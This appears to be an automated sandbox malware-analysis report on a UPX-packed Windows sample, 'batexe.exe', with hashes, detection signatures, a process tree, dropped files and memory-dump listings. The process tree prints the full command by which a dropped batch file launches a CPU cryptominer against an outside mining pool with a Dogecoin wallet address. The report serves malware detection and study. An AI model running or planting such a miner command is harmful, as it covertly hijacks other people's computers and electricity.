73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
294s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
21/02/2024, 06:34

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1632	b2e.exe
2152	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2152	cpuminer-sse2.exe
2152	cpuminer-sse2.exe
2152	cpuminer-sse2.exe
2152	cpuminer-sse2.exe
2152	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/308-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 308 wrote to memory of 1632	308	batexe.exe	75
PID 308 wrote to memory of 1632	308	batexe.exe	75
PID 308 wrote to memory of 1632	308	batexe.exe	75
PID 1632 wrote to memory of 1160	1632	b2e.exe	76
PID 1632 wrote to memory of 1160	1632	b2e.exe	76
PID 1632 wrote to memory of 1160	1632	b2e.exe	76
PID 1160 wrote to memory of 2152	1160	cmd.exe	79
PID 1160 wrote to memory of 2152	1160	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:308
- C:\Users\Admin\AppData\Local\Temp\922E.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\922E.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\922E.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9441.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1160
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\922E.tmp\b2e.exe

Filesize
2.5MB

MD5
52f219fb26f25cf99d5d5c6dedac2701

SHA1
a643938407d2a4aa49ed7989a0eb803e74cf1014

SHA256
639a43677efc62694a8d486ef11e38f220b82fb90ae7e9b6931a1eb065356a96

SHA512
3f174f7e81339bb70da464ad9a1891026be08439db5c2c58d8db7faf2f650afea56fdaca4093bd05008dd3e460e75a06eefc0cee02f8d48041ab220fd1bd06f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\922E.tmp\b2e.exe

Filesize
1.9MB

MD5
8789d4643d7832c4223ac600d806ebda

SHA1
f8a39753fed626135f98a8b23acd835d3978a296

SHA256
0d7822f80704b7bb6a82968709a9e968137747cd8147426b1ef315847922a89a

SHA512
b80227f3b6c9ca4edd8149e14302ea83521fc545c8aed0cb446f66634d09768c86f10abef530b6200fb9948f8f60f64821dcd4f4d17ea6c69f51c70a7383ced4

Download Submit
C:\Users\Admin\AppData\Local\Temp\9441.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
728KB

MD5
d424899f9d464f09f3625f64cf179091

SHA1
e1c79fc8a401681f2ca705754c9a0c439298272d

SHA256
3a40fdb7754ac9171460952a64d628979c51c5d2f5255841b9db161e0adddccc

SHA512
8bc330689a083d8483dcfd97802bd0bc8e30525b699a135674469f81e7825a53115bc703803a9f801ca807887feaa630f334402c9d6ba910a8263ce099febd5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
398KB

MD5
08f0e9f57ffb34024540ccf3a8076be0

SHA1
1217a94e68737d3cccb5c1588224de8b0e574b08

SHA256
841d5b4e9e94a469079707f4c169f2a59a979a75a35d6593af1f3cfd25023373

SHA512
ac6e43cbaefe8457330661291ef359989c5563cc64f3b59fd93c5335c77562bfdb5066f13ab167d9b42359711dc58cf89b2ff8ac77764ca58361564d91dfb566

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
685KB

MD5
a1bf4301e8c16e1397d6e944dc47090b

SHA1
6b10265bc282a99d15300372d117627ebbeded69

SHA256
8400e6cf0d3e0d3033dd6878ac3f0220acc6cd6e1118c4d925c681bc529cc022

SHA512
e8a6ff020f0a638f767039483ffa3492c0aafe60ae0e3a1ca6a636687824a4f015684c6d9f86dd206033cf1132fe3f9ee06f306dd8f3fd2efdeb1316c4a8310b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
723KB

MD5
b9d8f94e25d951186077c44ed00c32cb

SHA1
6ee00bb3d11444a4ce55b529a3e22ee64ed11a12

SHA256
07412417ff8bed6573f160f7f3a1f680dd68a17c43ee9200fc202c9acb9201c0

SHA512
b624b163d61fe15af9fbe7ea935f3bc64457615e58132d947af94ad9fb03e4c23187fc329e2a81f4401f06b21d7afaa12fcc4aa705ae3f8fcd5637be3bffccea

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
700KB

MD5
ba3ba949321c6124de76acb80222fbf6

SHA1
452a5f1844dca03e765be8e61565d496079f7467

SHA256
4387e42b5a92e6f4bb34b22cca47c6bdd84cc991c2cfef8304f52f2c26248e42

SHA512
7743933d3c1651adc9b57d435d17d7aac85e9a25b3ecbcf8661d642fdfa5983414a1fc35496e82020036c59b89d9d19f43adf194b306c63231f4a0ef7131fe7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
589KB

MD5
7e9b5a30216eade7f113f1a9b6c51d23

SHA1
5863cba953ccb08d2d82c2b96bfe2512150c80fa

SHA256
369482b8f86930a165e15fe01db9d4bf305b754a7041b685288cc111618f4dfb

SHA512
1e80ea9791b91657b98bde8fd1c61052a7d1b6fe8c600a0febe2124f04a1134819ae66f771d08e41b93496947f5f7a4e1d802482a769762ceb7fe9a03d0f024d

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
571KB

MD5
96de16b6144dd7a84e93740022d039af

SHA1
be967338bd684323445dc6586adba4c973286d05

SHA256
057b35adcd5e4a6e77b6a76612c5ec6a7debdc8465c907374885e577254158dc

SHA512
bc71a90a5d731c3ce0a4f6b5e540105ce6774f4d169c42b639abe59f39bf6c157d057377916502654a8061601d6cdf6ed3be7f3ceb54cd76941dfb7b25f6db18

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
549KB

MD5
d5123912c44084108680763a6f601274

SHA1
43f9f3c9d2f59b7622154bea76ade18d995cd5be

SHA256
87324fa9c0aabe55fa6aa63764e75f9f107cc7047a46440902ebb3590359346c

SHA512
5651dc90628ed22b34fc6c811d349a614b1bba7cf6903e2b3dfbb64902da2ebe946612545d687153f1575ffe35173772f5d14c3ab1082551157dfa6d79972884

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
502KB

MD5
6a4276ac8a9a24cd089d80d94deaf8ce

SHA1
9eac77c77822cb31ea88ac1f1b805bdd83607d2e

SHA256
fdda6bb345ef1299526c3a4f7d742a4e5ad117bf14598a8df6febe3e61b10b56

SHA512
d24bd6c489be5d3e0e657b2cc8975e64a96c25ee8b1d71e84dc23913be51a926a3ed6896362d8ec3fbda83c36b59819a8fa3a1e8d799fd17e39b2c0b905992d3

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
590KB

MD5
ef5e4caad2dc1a98408ebd3f78bc4f06

SHA1
9890fef19e5e14b91e01fc1a157a1f5368284c2d

SHA256
3d5e03242274aa83e0f28b6bea8d39afa4e76ea9eea9be0f240cb60b216650c4

SHA512
270fe14000418a915390489759a79993d5d32731498b579895c028ba7e0bb06066b89716da93de9e344fc3bc96ebd7b506eb1096bf29590231fb4afa3d3ef158

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/308-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1632-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1632-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2152-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2152-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2152-43-0x0000000065D00000-0x0000000065D98000-memory.dmp

Filesize
608KB

Download
memory/2152-44-0x00000000010C0000-0x0000000002975000-memory.dmp

Filesize
24.7MB

Download
memory/2152-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2152-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2152-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2152-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2152-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2152-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2152-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2152-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2152-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download